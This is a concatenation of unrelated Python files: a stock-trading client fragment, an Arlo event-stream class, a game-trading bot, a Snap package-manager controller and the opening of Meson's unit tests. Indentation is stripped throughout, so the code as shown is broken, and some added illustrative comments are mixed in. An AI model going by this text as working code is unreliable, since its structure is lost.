if _.StatusCode == 'Registered':
tr.status = stbase.Constants.OrderStatus.Registered
elif _.StatusCode == 'Pending_Dealing':
tr.status = stbase.Constants.OrderStatus.Pending_Dealing
elif _.StatusCode == 'Rejected':
tr.status = stbase.Constants.OrderStatus.Rejected
elif _.StatusCode == 'Pending_Cancel':
tr.status = stbase.Constants.OrderStatus.Pending_Cancel
elif _.StatusCode == 'Cancelled':
tr.status = stbase.Constants.OrderStatus.Cancelled
elif _.StatusCode == 'Partially_Pending_Cancel':
tr.status = stbase.Constants.OrderStatus.Partial_Pending_Cancel
elif _.StatusCode == 'Partially_Cancelled':
tr.status = stbase.Constants.OrderStatus.Partial_Cancelled
elif _.StatusCode == 'Partially_Filled':
tr.status = stbase.Constants.OrderStatus.Partial_Filled
elif _.StatusCode == 'Fully_Filled':
tr.status = stbase.Constants.OrderStatus.Fully_Filled
elif _.StatusCode == 'Auditing':
tr.status = stbase.Constants.OrderStatus.Auditing
elif _.StatusCode == 'AuditError':
tr.status = stbase.Constants.OrderStatus.AuditError
tr_list.append(tr)
stbase.Trader.onRtsChanged(self, tr_list)
# stbase.println('onRtsChanged(), size:%s'%(len(rts_list)))
def onPositionChanged(self):
# position and funds change notification
stbase.Trader.onPositionChanged(self)
# stbase.println('onPositionChanged() , ')
def get_gddm(self,code):
"""获得股东代码"""
return ''
def sendOrder(self, order_req = stbase.OrderRequest(code='')):
"""发送订单
:param: order_req : stbase.OrderRequest
"""
# 0 buy
# 1 sell
Buy = 0
Sell = 1
direction = Buy
if order_req.direction == stbase.Constants.Sell:
direction = Sell
# print order_req.dict()
"""
Order pricing modes:
0 limit order (Shanghai limit / Shenzhen limit)
1 market order (Shenzhen: counterparty best price)
2 market order (Shenzhen: own-side best price)
3 market order (Shenzhen: immediate-or-cancel)
4 market order (Shanghai/Shenzhen: best-five immediate, cancel remainder)
5 market order (Shenzhen: fill-or-kill)
6 market order (Shanghai: best-five immediate, remainder converts to limit)
"""
order_type = 0
gddm = self.get_gddm(order_req.code) # shareholder code
status,content = self.trade_conn.SendOrder(direction,order_type,gddm,order_req.code,order_req.price,order_req.quantity)
if status < 0:
print "error: " + content.decode('gbk')
else:
print content.decode('gbk')
order_id = ''
return order_id
def get_code_by_order_id(self,order_id):
"""查询委托单的证券代码"""
order = self.orders.get(order_id)
if order:
return order.code
else:
print self.orders
return ''
def get_market_by_order_id(self,order_id):
"""根据订单编号查询市场编号"""
code = self.get_code_by_order_id(order_id)
return getMaketTypeByCode(code)
def cancelOrder(self,order_id):
market_id = self.get_market_by_order_id(order_id)
if market_id == Market_NULL:
print 'error: MarketID is Null :',order_id
return
errinfo,result = self.trade_conn.CancelOrder(market_id,order_id)
if errinfo:
print errinfo.decode('gbk')
else:
print result.decode('gbk')
def getPosition(self,code='',strategy_id='',direction= stbase.Constants.Buy):
"""查询指定 股票代码或者指定策略的持仓记录"""
if code:
pos = self.position_list.get(code)
if not pos:
pos = stbase.Position()
return pos
return self.position_list.values()
def getOrders(self,order_id='',code='',strategy_id=''):
"""查询委托信息,状态包括: 未成、部分成、全成、错误
strategy_id 作为 委托的 orign source 字段
"""
return self.orders.values()
def getAmountUsable(self):
"""账户可用资金"""
return self.stat.usable_amount
def getAmountAsset(self):
"""现货总资产"""
return self.stat.asset_amount
class TdxPosition(stbase.Position):
"""持仓记录"""
def __init__(self):
stbase.Position.__init__(self)
self.name = '' # security name
self.last_price = 0 # current price
self.gddm = '' # shareholder code
if __name__ == '__main__':
trader = TDX_StockTrader().init()
trader.open()
trader.wait_for_shutdown()
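# --- Usage sketch (illustrative; every value below is a placeholder) ---
# The keyword names are the config keys read via self.cfgs.get() above.
# market = TDX_StockMarket().init(quote_host='<hq-server>', quote_port=7709)
# market.open()
# market.subTick('000001', on_tick_handler)
# market.subBar('000001', on_bar_handler, cycle='1m')
# trader = TDX_StockTrader().init(broker_name='DONGFANG', qsid=36, host='<trade-server>',
#                                 port=7700, version='2.03', branch_id=0, account_type=0,
#                                 client_account='<account>', broker_account='<account>',
#                                 password='<password>', tx_password='')
# trader.open()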
|
eventstream.py
|
##
# Copyright 2016 Jeffrey D. Walter
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
import monotonic
import threading
import sys
if sys.version[0] == '2':
import Queue as queue
else:
import queue as queue
# TODO: There's a lot more refactoring that could/should be done to abstract out the arlo-specific implementation details.
class EventStream(object):
"""This class provides a queue-based EventStream object."""
def __init__(self, event_handler, heartbeat_handler, sse, id, args):
self.connected = False
self.registered = False
self.queue = queue.Queue()
self.heartbeat_stop_event = threading.Event()
self.event_stream_stop_event = threading.Event()
self.arlo = args[0]
self.heartbeat_handler = heartbeat_handler
self.heartbeat_thread = None
self.id = id
try:
self.event_stream_thread = threading.Thread(name="EventStream_" + self.id, target=event_handler, args=(self.arlo, sse, self.event_stream_stop_event, ))
self.event_stream_thread.setDaemon(True)
if args[1] == True:
self.Connect()
except Exception as e:
raise Exception('Failed to subscribe to eventstream: {0}'.format(e))
def __del__(self):
self.Disconnect()
def Get(self, block=True, timeout=None):
if sys.version[0] == '2' and block:
if timeout:
timeout += monotonic.monotonic()
# If timeout is None, just pick an arbitrarily large number for the timeout value.
else:
timeout = 1000000 + monotonic.monotonic()
while True:
try:
# Allow check for Ctrl-C every second
item = self.queue.get(timeout=min(1, timeout - monotonic.monotonic()))
self.queue.task_done()
return item
except queue.Empty:
if monotonic.monotonic() > timeout:
return None
else:
pass
else:
try:
item = self.queue.get(block=block, timeout=timeout)
self.queue.task_done()
return item
except queue.Empty as e:
return None
except Exception as e:
return None
def Start(self):
self.event_stream_thread.start()
return self
def Connect(self):
self.connected = True
def Disconnect(self):
self.connected = False
self.Unregister()
def Register(self):
self.heartbeat_thread = threading.Thread(name='HeartbeatThread_' + self.id, target=self.heartbeat_handler, args=(self.arlo, self.heartbeat_stop_event, ))
self.heartbeat_thread.setDaemon(True)
self.heartbeat_thread.start()
self.registered = True
def Unregister(self):
self.registered = False
if self.queue:
self.queue.put(None)
self.event_stream_stop_event.set()
self.heartbeat_stop_event.set()
if self.event_stream_thread != threading.current_thread():
self.event_stream_thread.join()
if self.heartbeat_thread and self.heartbeat_thread != threading.current_thread():
self.heartbeat_thread.join()
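# --- Usage sketch (illustrative, not part of the original module) ---
# The handler signatures below are inferred from how the threads are created
# above (event_handler gets (arlo, sse, stop_event), heartbeat_handler gets
# (arlo, stop_event)); the arlo/sse objects and the id value are placeholders.
#
# def event_handler(arlo, sse, stop_event):
#     while not stop_event.is_set():
#         ...  # consume events from sse
#
# def heartbeat_handler(arlo, stop_event):
#     while not stop_event.is_set():
#         ...  # periodically ping the service
#
# stream = EventStream(event_handler, heartbeat_handler, sse, id='basestation', args=(arlo, True))
# stream.Start()
# stream.Register()
# event = stream.Get(timeout=30)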
|
bot.py
|
import logging
import time
import sys
import numpy as np
import re
import keyboard
from multiprocessing import Value, Process
from queue import Queue
from bson.objectid import ObjectId
from datetime import datetime
from .trader import Trader
from .tree_navigator import TreeNavigator
from .utils import get_config, filter_mod
from .input_handler import InputHandler
class Bot:
def __init__(self):
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s %(message)s",
datefmt="[%H:%M:%S %d-%m-%Y]",
filename="jewels.log",
encoding='utf-8',
)
self.log = logging.getLogger("bot")
self.config = get_config("bot")
self.resolution = self.split_res(self.config["resolution"])
self.nonalpha_re = re.compile("[^a-zA-Z]")
self.trader = Trader(self.resolution, self.config["accept_trades"])
self.input_handler = InputHandler(self.resolution)
self.halt = Value("i", False)
self.hotkey_killer = Process(
target=hotkey_killer, args=(self.halt, self.config["exit_hotkey"])
)
self.hotkey_killer.daemon = True
self.hotkey_killer.start()
def loop(self):
# self.log.info(
print(
"Quit the application by pressing %s" % self.config["exit_hotkey"]
)
# self.log.info(
print(
"Bot starts in %s seconds. Please tab into the game client."
% self.config["initial_sleep"]
)
time.sleep(int(self.config["initial_sleep"]))
while True:
if self.config["accept_trades"]:
empty = self.trader.verify_empty_inventory()
if not empty:
self.trader.stash_items()
username = self.trader.wait_for_trade()
successfully_received = self.trader.get_items(username)
if not successfully_received:
continue
else:
username = "nerdyjoe314"
jewel_locations, descriptions = self.trader.get_jewel_locations()
self.log.info("Got %s new jewels" % len(jewel_locations))
long_break_at_idx = np.random.choice(
60, self.config["breaks_per_full_inventory"]
)
for idx, jewel_location in enumerate(jewel_locations):
if not self._run():
self.log.info("Exiting.")
return
self.log.info(
"Analyzing jewel (%s/%s) with description: %s"
% (idx, len(jewel_locations), descriptions[idx])
)
if idx in long_break_at_idx:
self.log.info("Taking a break of around 5 minutes.")
self.input_handler.rnd_sleep(mean=300000, sigma=100000, min=120000)
self.tree_nav = TreeNavigator(self.resolution, self.halt)
analysis_time = datetime.utcnow()
name, description = self.tree_nav.eval_jewel(
jewel_location
)
print(
"Jewel evaluation took %s seconds"
% (datetime.utcnow() - analysis_time).seconds
)
self.log.info(
"Jewel evaluation took %s seconds"
% (datetime.utcnow() - analysis_time).seconds
)
if self.config["accept_trades"]:
self.trader.return_items(username, jewel_locations)
else:
self.log.info("Inventory analysis complete!")
break
# def store_items(self, socket_instances):
# # Add some filtered summed values for easier querying
# for jewel_inst in socket_instances:
# jewel_inst["summed_mods"] = {}
# for node in jewel_inst["socket_nodes"]:
# for mod in node["mods"]:
# filt_mod, value = filter_mod(mod, regex=self.nonalpha_re)
# if filt_mod in jewel_inst["summed_mods"]:
# jewel_inst["summed_mods"][filt_mod] += value
# else:
# jewel_inst["summed_mods"][filt_mod] = value
#return result
def split_res(self, resolution):
resolution = [int(n) for n in resolution.split("x")]
return resolution
def _run(self):
halt = bool(self.halt.value)
if halt:
self.hotkey_killer.join()
return not halt
def hotkey_killer(halt_value, hotkey):
while True:
if keyboard.is_pressed(hotkey):
halt_value.value += 1
return
time.sleep(0.1)
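# --- Note (illustrative) ---
# hotkey_killer runs as a separate process and bumps the shared multiprocessing.Value
# once the configured exit hotkey (config key "exit_hotkey") is pressed; Bot._run()
# checks that flag between jewels, so the main loop exits cleanly after the current
# jewel finishes. split_res() turns a resolution string such as "1920x1080" into [1920, 1080].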
|
controller.py
|
import re
import time
import traceback
from threading import Thread
from typing import List, Set, Type, Optional, Tuple
from bauh.api.abstract.controller import SoftwareManager, SearchResult, ApplicationContext, UpgradeRequirements, \
TransactionResult, SoftwareAction
from bauh.api.abstract.disk import DiskCacheLoader
from bauh.api.abstract.handler import ProcessWatcher, TaskManager
from bauh.api.abstract.model import SoftwarePackage, PackageHistory, PackageUpdate, PackageSuggestion, \
SuggestionPriority, CustomSoftwareAction, PackageStatus
from bauh.api.abstract.view import SingleSelectComponent, SelectViewType, InputOption, ViewComponent, PanelComponent, \
FormComponent, TextInputComponent
from bauh.api.exception import NoInternetException
from bauh.commons import resource
from bauh.commons.boot import CreateConfigFile
from bauh.commons.category import CategoriesDownloader
from bauh.commons.html import bold
from bauh.commons.system import SystemProcess, ProcessHandler, new_root_subprocess, get_human_size_str
from bauh.commons.view_utils import new_select
from bauh.gems.snap import snap, URL_CATEGORIES_FILE, CATEGORIES_FILE_PATH, SUGGESTIONS_FILE, \
get_icon_path, snapd, ROOT_DIR
from bauh.gems.snap.config import SnapConfigManager
from bauh.gems.snap.model import SnapApplication
from bauh.gems.snap.snapd import SnapdClient
RE_AVAILABLE_CHANNELS = re.compile(r'(\w+)\s+(snap install.+)')
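# Illustrative: intended to pull (channel, install command) pairs out of snap's
# "not available on stable" error output, e.g. a line such as
# "beta    snap install foo --beta" would yield ('beta', 'snap install foo --beta').
# The exact wording of that output depends on the snap CLI version.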
class SnapManager(SoftwareManager):
def __init__(self, context: ApplicationContext):
super(SnapManager, self).__init__(context=context)
self.i18n = context.i18n
self.api_cache = context.cache_factory.new()
context.disk_loader_factory.map(SnapApplication, self.api_cache)
self.enabled = True
self.http_client = context.http_client
self.logger = context.logger
self.ubuntu_distro = context.distro == 'ubuntu'
self.categories = {}
self.suggestions_cache = context.cache_factory.new()
self.info_path = None
self.configman = SnapConfigManager()
self.custom_actions = (
CustomSoftwareAction(i18n_status_key='snap.action.refresh.status',
i18n_label_key='snap.action.refresh.label',
icon_path=resource.get_path('img/refresh.svg', ROOT_DIR),
manager_method='refresh',
requires_root=True,
i18n_confirm_key='snap.action.refresh.confirm'),
CustomSoftwareAction(i18n_status_key='snap.action.channel.status',
i18n_label_key='snap.action.channel.label',
i18n_confirm_key='snap.action.channel.confirm',
icon_path=resource.get_path('img/refresh.svg', ROOT_DIR),
manager_method='change_channel',
requires_root=True,
requires_confirmation=False)
)
def _fill_categories(self, app: SnapApplication):
categories = self.categories.get(app.name.lower())
if categories:
app.categories = categories
if not app.is_application():
categories = app.categories
if categories is None:
categories = []
app.categories = categories
if 'runtime' not in categories:
categories.append('runtime')
def search(self, words: str, disk_loader: DiskCacheLoader, limit: int = -1, is_url: bool = False) -> SearchResult:
if is_url or (not snap.is_installed() and not snapd.is_running()):
return SearchResult([], [], 0)
snapd_client = SnapdClient(self.logger)
apps_found = snapd_client.query(words)
res = SearchResult([], [], 0)
if apps_found:
installed = self.read_installed(disk_loader).installed
for app_json in apps_found:
already_installed = None
if installed:
already_installed = [i for i in installed if i.id == app_json.get('id')]
already_installed = already_installed[0] if already_installed else None
if already_installed:
res.installed.append(already_installed)
else:
res.new.append(self._map_to_app(app_json, installed=False))
res.total = len(res.installed) + len(res.new)
return res
def read_installed(self, disk_loader: DiskCacheLoader, limit: int = -1, only_apps: bool = False, pkg_types: Set[Type[SoftwarePackage]] = None, internet_available: bool = None) -> SearchResult:
if snap.is_installed() and snapd.is_running():
snapd_client = SnapdClient(self.logger)
app_names = {a['snap'] for a in snapd_client.list_only_apps()}
installed = [self._map_to_app(app_json=appjson,
installed=True,
disk_loader=disk_loader,
is_application=app_names and appjson['name'] in app_names) for appjson in snapd_client.list_all_snaps()]
return SearchResult(installed, None, len(installed))
else:
return SearchResult([], None, 0)
def downgrade(self, pkg: SnapApplication, root_password: str, watcher: ProcessWatcher) -> bool:
if not snap.is_installed():
watcher.print("'snap' seems not to be installed")
return False
if not snapd.is_running():
watcher.print("'snapd' seems not to be running")
return False
return ProcessHandler(watcher).handle_simple(snap.downgrade_and_stream(pkg.name, root_password))[0]
def upgrade(self, requirements: UpgradeRequirements, root_password: str, watcher: ProcessWatcher) -> SystemProcess:
raise Exception(f"'upgrade' is not supported by {SnapManager.__class__.__name__}")
def uninstall(self, pkg: SnapApplication, root_password: str, watcher: ProcessWatcher, disk_loader: DiskCacheLoader) -> TransactionResult:
if snap.is_installed() and snapd.is_running():
uninstalled = ProcessHandler(watcher).handle_simple(snap.uninstall_and_stream(pkg.name, root_password))[0]
if uninstalled:
if self.suggestions_cache:
self.suggestions_cache.delete(pkg.name)
return TransactionResult(success=True, installed=None, removed=[pkg])
return TransactionResult.fail()
def get_managed_types(self) -> Set[Type[SoftwarePackage]]:
return {SnapApplication}
def clean_cache_for(self, pkg: SnapApplication):
super(SnapManager, self).clean_cache_for(pkg)
self.api_cache.delete(pkg.id)
def get_info(self, pkg: SnapApplication) -> dict:
info = {
'description': pkg.description,
'developer': pkg.developer,
'license': pkg.license,
'contact': pkg.contact,
'snap-id': pkg.id,
'name': pkg.name,
'publisher': pkg.publisher,
'revision': pkg.rev,
'tracking': pkg.tracking,
'channel': pkg.channel,
'type': pkg.type
}
if pkg.installed:
commands = [*{c['name'] for c in SnapdClient(self.logger).list_commands(pkg.name)}]
commands.sort()
info['commands'] = commands
if pkg.installed_size:
info['installed_size'] = get_human_size_str(pkg.installed_size)
elif pkg.download_size:
info['download_size'] = get_human_size_str(pkg.download_size)
return info
def get_history(self, pkg: SnapApplication) -> PackageHistory:
raise Exception(f"'get_history' is not supported by {pkg.__class__.__name__}")
def install(self, pkg: SnapApplication, root_password: str, disk_loader: DiskCacheLoader, watcher: ProcessWatcher) -> TransactionResult:
# retrieving all installed so it will be possible to know the additional installed runtimes after the operation succeeds
if not snap.is_installed():
watcher.print("'snap' seems not to be installed")
return TransactionResult.fail()
if not snapd.is_running():
watcher.print("'snapd' seems not to be running")
return TransactionResult.fail()
installed_names = {s['name'] for s in SnapdClient(self.logger).list_all_snaps()}
client = SnapdClient(self.logger)
snap_config = self.configman.get_config()
try:
channel = self._request_channel_installation(pkg=pkg, snap_config=snap_config, snapd_client=client, watcher=watcher)
pkg.channel = channel
except:
watcher.print('Aborted by user')
return TransactionResult.fail()
res, output = ProcessHandler(watcher).handle_simple(snap.install_and_stream(app_name=pkg.name,
confinement=pkg.confinement,
root_password=root_password,
channel=channel))
if 'error:' in output:
res = False
if 'not available on stable' in output:
channels = RE_AVAILABLE_CHANNELS.findall(output)
if channels:
opts = [InputOption(label=c[0], value=c[1]) for c in channels]
channel_select = SingleSelectComponent(type_=SelectViewType.RADIO, label='', options=opts, default_option=opts[0])
body = f"<p>{self.i18n['snap.install.available_channels.message'].format(bold(self.i18n['stable']), bold(pkg.name))}.</p>"
body += f"<p>{self.i18n['snap.install.available_channels.help']}:</p>"
if watcher.request_confirmation(title=self.i18n['snap.install.available_channels.title'],
body=body,
components=[channel_select],
confirmation_label=self.i18n['continue'],
deny_label=self.i18n['cancel']):
self.logger.info(f"Installing '{pkg.name}' with the custom command '{channel_select.value}'")
res = ProcessHandler(watcher).handle(SystemProcess(new_root_subprocess(channel_select.value.value.split(' '), root_password=root_password)))
return self._gen_installation_response(success=res, pkg=pkg,
installed=installed_names, disk_loader=disk_loader)
else:
self.logger.error(f"Could not find available channels in the installation output: {output}")
return self._gen_installation_response(success=res, pkg=pkg, installed=installed_names, disk_loader=disk_loader)
def _gen_installation_response(self, success: bool, pkg: SnapApplication, installed: Set[str], disk_loader: DiskCacheLoader):
if success:
new_installed = []
try:
net_available = self.context.internet_checker.is_available()
current_installed = self.read_installed(disk_loader=disk_loader, internet_available=net_available).installed
except:
new_installed = [pkg]
traceback.print_exc()
current_installed = None
if current_installed:
for p in current_installed:
if p.name == pkg.name or (not installed or p.name not in installed):
new_installed.append(p)
return TransactionResult(success=success, installed=new_installed, removed=[])
else:
return TransactionResult.fail()
def is_enabled(self) -> bool:
return self.enabled
def set_enabled(self, enabled: bool):
self.enabled = enabled
def can_work(self) -> Tuple[bool, Optional[str]]:
return (True, None) if snap.is_installed() else (False, self.i18n['missing_dep'].format(dep=bold('snap')))
def requires_root(self, action: SoftwareAction, pkg: SnapApplication) -> bool:
return action not in (SoftwareAction.PREPARE, SoftwareAction.SEARCH)
def refresh(self, pkg: SnapApplication, root_password: str, watcher: ProcessWatcher) -> bool:
return ProcessHandler(watcher).handle_simple(snap.refresh_and_stream(pkg.name, root_password))[0]
def change_channel(self, pkg: SnapApplication, root_password: str, watcher: ProcessWatcher) -> bool:
if not self.context.internet_checker.is_available():
raise NoInternetException()
try:
channel = self._request_channel_installation(pkg=pkg,
snap_config=None,
snapd_client=SnapdClient(self.logger),
watcher=watcher,
exclude_current=True)
if not channel:
watcher.show_message(title=self.i18n['snap.action.channel.label'],
body=self.i18n['snap.action.channel.error.no_channel'])
return False
return ProcessHandler(watcher).handle_simple(snap.refresh_and_stream(app_name=pkg.name,
root_password=root_password,
channel=channel))[0]
except:
return False
def _start_category_task(self, taskman: TaskManager, create_config: CreateConfigFile, downloader: CategoriesDownloader):
if taskman:
taskman.update_progress('snap_cats', 0, self.i18n['task.waiting_task'].format(bold(create_config.task_name)))
create_config.join()
categories_exp = create_config.config['categories_exp']
downloader.expiration = categories_exp if isinstance(categories_exp, int) else None
taskman.update_progress('snap_cats', 1, None)
def _finish_category_task(self, taskman: TaskManager):
if taskman:
taskman.update_progress('snap_cats', 100, None)
taskman.finish_task('snap_cats')
def prepare(self, task_manager: TaskManager, root_password: str, internet_available: bool):
create_config = CreateConfigFile(taskman=task_manager, configman=self.configman, i18n=self.i18n,
task_icon_path=get_icon_path(), logger=self.logger)
create_config.start()
task_manager.register_task('snap_cats', self.i18n['task.download_categories'], get_icon_path())
category_downloader = CategoriesDownloader(id_='snap', manager=self, http_client=self.http_client,
logger=self.logger,
url_categories_file=URL_CATEGORIES_FILE,
categories_path=CATEGORIES_FILE_PATH,
internet_connection=internet_available,
internet_checker=self.context.internet_checker,
after=lambda: self._finish_category_task(task_manager))
category_downloader.before = lambda: self._start_category_task(task_manager, create_config, category_downloader)
category_downloader.start()
def list_updates(self, internet_available: bool) -> List[PackageUpdate]:
pass
def list_warnings(self, internet_available: bool) -> Optional[List[str]]:
if not snapd.is_running():
snap_bold = bold('Snap')
return [self.i18n['snap.notification.snapd_unavailable'].format(bold('snapd'), snap_bold),
self.i18n['snap.notification.snap.disable'].format(snap_bold,
bold(f"{self.i18n['settings'].capitalize()} > {self.i18n['core.config.tab.types']}"))]
elif internet_available:
available, output = snap.is_api_available()
if not available:
self.logger.warning(f'It seems Snap API is not available. Search output: {output}')
return [self.i18n['snap.notifications.api.unavailable'].format(bold('Snaps'), bold('Snap'))]
def _fill_suggestion(self, name: str, priority: SuggestionPriority, snapd_client: SnapdClient, out: List[PackageSuggestion]):
res = snapd_client.find_by_name(name)
if res:
if len(res) == 1:
app_json = res[0]
else:
jsons_found = [p for p in res if p['name'] == name]
app_json = jsons_found[0] if jsons_found else None
if app_json:
sug = PackageSuggestion(self._map_to_app(app_json, False), priority)
self.suggestions_cache.add(name, sug)
out.append(sug)
return
self.logger.warning(f"Could not retrieve suggestion '{name}'")
def _map_to_app(self, app_json: dict, installed: bool, disk_loader: Optional[DiskCacheLoader] = None, is_application: bool = False) -> SnapApplication:
app = SnapApplication(id=app_json.get('id'),
name=app_json.get('name'),
license=app_json.get('license'),
version=app_json.get('version'),
latest_version=app_json.get('version'),
description=app_json.get('description', app_json.get('summary')),
installed=installed,
rev=app_json.get('revision'),
publisher=app_json['publisher'].get('display-name', app_json['publisher'].get('username')),
verified_publisher=app_json['publisher'].get('validation') == 'verified',
icon_url=app_json.get('icon'),
screenshots={m['url'] for m in app_json.get('media', []) if m['type'] == 'screenshot'},
download_size=app_json.get('download-size'),
channel=app_json.get('channel'),
confinement=app_json.get('confinement'),
app_type=app_json.get('type'),
app=is_application,
installed_size=app_json.get('installed-size'),
extra_actions=self.custom_actions)
if disk_loader and app.installed:
disk_loader.fill(app)
self._fill_categories(app)
app.status = PackageStatus.READY
return app
def list_suggestions(self, limit: int, filter_installed: bool) -> List[PackageSuggestion]:
res = []
if snapd.is_running():
self.logger.info(f'Downloading suggestions file {SUGGESTIONS_FILE}')
file = self.http_client.get(SUGGESTIONS_FILE)
if not file or not file.text:
self.logger.warning(f"No suggestion found in {SUGGESTIONS_FILE}")
return res
else:
self.logger.info('Mapping suggestions')
suggestions, threads = [], []
snapd_client = SnapdClient(self.logger)
installed = {s['name'].lower() for s in snapd_client.list_all_snaps()}
for l in file.text.split('\n'):
if l:
if limit <= 0 or len(suggestions) < limit:
sug = l.strip().split('=')
name = sug[1]
if not installed or name not in installed:
cached_sug = self.suggestions_cache.get(name)
if cached_sug:
res.append(cached_sug)
else:
t = Thread(target=self._fill_suggestion, args=(name, SuggestionPriority(int(sug[0])), snapd_client, res))
t.start()
threads.append(t)
time.sleep(0.001) # to avoid being blocked
else:
break
for t in threads:
t.join()
res.sort(key=lambda s: s.priority.value, reverse=True)
return res
def is_default_enabled(self) -> bool:
return True
def launch(self, pkg: SnapApplication):
commands = SnapdClient(self.logger).list_commands(pkg.name)
if commands:
if len(commands) == 1:
cmd = commands[0]['name']
else:
desktop_cmd = [c for c in commands if 'desktop-file' in c]
if desktop_cmd:
cmd = desktop_cmd[0]['name']
else:
cmd = commands[0]['name']
self.logger.info(f"Running '{pkg.name}': {cmd}")
snap.run(cmd)
def get_screenshots(self, pkg: SnapApplication) -> List[str]:
return pkg.screenshots if pkg.has_screenshots() else []
def get_settings(self, screen_width: int, screen_height: int) -> Optional[ViewComponent]:
snap_config = self.configman.get_config()
max_width = 200
install_channel = new_select(label=self.i18n['snap.config.install_channel'],
opts=[(self.i18n['yes'].capitalize(), True, None),
(self.i18n['no'].capitalize(), False, None)],
value=bool(snap_config['install_channel']),
id_='snap_install_channel',
max_width=max_width,
tip=self.i18n['snap.config.install_channel.tip'])
categories_exp = TextInputComponent(id_='snap_cat_exp',
value=snap_config['categories_exp'] if isinstance(snap_config['categories_exp'], int) else '',
max_width=max_width,
only_int=True,
label=self.i18n['snap.config.categories_exp'],
tooltip=self.i18n['snap.config.categories_exp.tip'])
return PanelComponent([FormComponent([install_channel, categories_exp], self.i18n['installation'].capitalize())])
def save_settings(self, component: ViewComponent) -> Tuple[bool, Optional[List[str]]]:
snap_config = self.configman.get_config()
panel = component.components[0]
snap_config['install_channel'] = panel.get_component('snap_install_channel').get_selected()
snap_config['categories_exp'] = panel.get_component('snap_cat_exp').get_int_value()
try:
self.configman.save_config(snap_config)
return True, None
except:
return False, [traceback.format_exc()]
def _request_channel_installation(self, pkg: SnapApplication, snap_config: Optional[dict], snapd_client: SnapdClient, watcher: ProcessWatcher, exclude_current: bool = False) -> Optional[str]:
if snap_config is None or snap_config['install_channel']:
try:
data = [r for r in snapd_client.find_by_name(pkg.name) if r['name'] == pkg.name]
except:
self.logger.warning(f"snapd client could not retrieve channels for '{pkg.name}'")
return
if not data:
self.logger.warning(f"snapd client could find a match for name '{pkg.name}' when retrieving its channels")
else:
if not data[0].get('channels'):
self.logger.info(f"No channel available for '{pkg.name}'. Skipping selection.")
else:
if pkg.channel:
current_channel = pkg.channel if '/' in pkg.channel else f'latest/{pkg.channel}'
else:
current_channel = f"latest/{data[0].get('channel', 'stable')}"
opts = []
def_opt = None
for channel in sorted(data[0]['channels'].keys()):
if exclude_current:
if channel != current_channel:
opts.append(InputOption(label=channel, value=channel))
else:
op = InputOption(label=channel, value=channel)
opts.append(op)
if not def_opt and channel == current_channel:
def_opt = op
if not opts:
self.logger.info(f"No different channel available for '{pkg.name}'. Skipping selection.")
return
select = SingleSelectComponent(label='',
options=opts,
default_option=def_opt if def_opt else opts[0],
type_=SelectViewType.RADIO)
if not watcher.request_confirmation(title=self.i18n['snap.install.available_channels.title'],
body=self.i18n['snap.install.channel.body'] + ':',
components=[select],
confirmation_label=self.i18n['proceed'].capitalize(),
deny_label=self.i18n['cancel'].capitalize()):
raise Exception('aborted')
else:
return select.get_selected()
|
run_unittests.py
|
#!/usr/bin/env python3
# Copyright 2016-2017 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import stat
import subprocess
import re
import json
import tempfile
import textwrap
import os
import shutil
import sys
import unittest
import platform
import pickle
import functools
import io
import operator
import threading
import urllib.error
import urllib.request
from itertools import chain
from unittest import mock
from configparser import ConfigParser
from contextlib import contextmanager
from glob import glob
from pathlib import (PurePath, Path)
from distutils.dir_util import copy_tree
import mesonbuild.mlog
import mesonbuild.depfile
import mesonbuild.compilers
import mesonbuild.environment
import mesonbuild.mesonlib
import mesonbuild.coredata
import mesonbuild.modules.gnome
from mesonbuild.interpreter import Interpreter, ObjectHolder
from mesonbuild.ast import AstInterpreter
from mesonbuild.mesonlib import (
BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows,
is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos,
windows_proof_rmtree, python_command, version_compare, split_args,
quote_arg
)
from mesonbuild.environment import detect_ninja
from mesonbuild.mesonlib import MesonException, EnvironmentException
from mesonbuild.dependencies import PkgConfigDependency, ExternalProgram
from mesonbuild.build import Target
import mesonbuild.modules.pkgconfig
from mesonbuild.mtest import TAPParser, TestResult
from run_tests import (
Backend, FakeBuild, FakeCompilerOptions,
ensure_backend_detects_changes, exe_suffix, get_backend_commands,
get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script,
run_configure_inprocess, run_mtest_inprocess
)
URLOPEN_TIMEOUT = 5
def get_dynamic_section_entry(fname, entry):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF platforms')
try:
raw_out = subprocess.check_output(['readelf', '-d', fname],
universal_newlines=True)
except FileNotFoundError:
# FIXME: Try using depfixer.py:Elf() as a fallback
raise unittest.SkipTest('readelf not found')
pattern = re.compile(entry + r': \[(.*?)\]')
for line in raw_out.split('\n'):
m = pattern.search(line)
if m is not None:
return m.group(1)
return None # The file did not contain the specified entry.
def get_soname(fname):
return get_dynamic_section_entry(fname, 'soname')
def get_rpath(fname):
return get_dynamic_section_entry(fname, r'(?:rpath|runpath)')
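# Hedged usage sketch (not part of the original file): how the ELF helpers above are
# typically exercised. The library path below is hypothetical.
def _example_readelf_helpers():
    # Returns e.g. ('libfoo.so.1', '$ORIGIN/../lib') on an ELF system, or None values
    # when the dynamic section lacks the corresponding entries.
    return get_soname('/usr/lib/libfoo.so'), get_rpath('/usr/lib/libfoo.so')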
def is_tarball():
if not os.path.isdir('docs'):
return True
return False
def is_ci():
if 'CI' in os.environ:
return True
return False
def is_pull():
# Travis
if os.environ.get('TRAVIS_PULL_REQUEST', 'false') != 'false':
return True
# Azure
if 'SYSTEM_PULLREQUEST_ISFORK' in os.environ:
return True
return False
def _git_init(project_dir):
subprocess.check_call(['git', 'init'], cwd=project_dir, stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'config',
